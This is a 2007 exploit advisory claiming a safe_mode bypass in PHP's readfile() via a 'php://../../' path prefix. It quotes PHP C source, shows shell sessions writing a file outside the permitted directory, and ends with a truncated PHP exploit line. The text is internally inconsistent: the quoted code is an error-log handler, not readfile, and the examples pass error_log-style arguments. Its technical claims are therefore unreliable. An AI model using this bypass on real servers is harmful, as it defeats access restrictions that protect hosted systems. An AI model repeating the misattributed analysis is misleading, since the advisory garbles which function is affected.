SecurityRisk : DEN Remote Exploit : No Local Exploit : Yes Exploit Given : Yes Credit : The-WolF-kSA Date : 24.3.2007 Affected Software : PHP 5.2.1/ 5.1.6 / 4.4.4 [readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4] Author: ThE-WoLf-KsA) Date: - -Written: 24.3.2007 - --- 0.Description --- - --- 1. readfile() Safe Mode Bypass --- readfile() function read throu, file or display your file or path. You can read into files. Issue is very simple. readfile() check safe_mode and open_basedir in stream function. But isn't allowed use URL. And problem exists in incorrect filename. PHP5: - -2013-2050--- PHPAPI int _php_readfile(int opt_err, char *message, char *opt, char *headers TSRMLS_DC) { php_stream *stream = NULL; switch (opt_err) { case 1: /*send an email */ { #if HAVE_SENDMAIL if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) { return FAILURE; } #else php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!"); return FAILURE; #endif } break; case 2: /*send to an address */ php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!"); return FAILURE; break; case 3: /*save to a file */ stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL); if (!stream) return FAILURE; php_stream_write(stream, message, strlen(message)); php_stream_close(stream); break; default: php_log_err(message TSRMLS_CC); break; } return SUCCESS; } - -2013-2050--- Let's see to option 3. - -2038 line--- stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL); - -2038 line--- Option "a", writte to file error or if file dosen't exists, create new file. Problem is because in php_stream_open_wrapper(), is defined "IGNORE_URL". IGNORE_URL turn off safe_mode if you use "prefix://../../". - -Example--- cxib# php -r 'readfile("", 3, "/www/temp/sr.php");' Warning: readfile(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1 Warning: readfile(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1 cxib# php -r 'readfile("", 3, "php://../../www/temp/sr.php");' cxib# ls -la /www/temp/sr.php - -rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php cxib# - -Example--- - --- 2. Exploit --- ", 3, "php://../../".$file); ?> - --- 4. Greets --- SniPer_hex - --- 5. Contact ---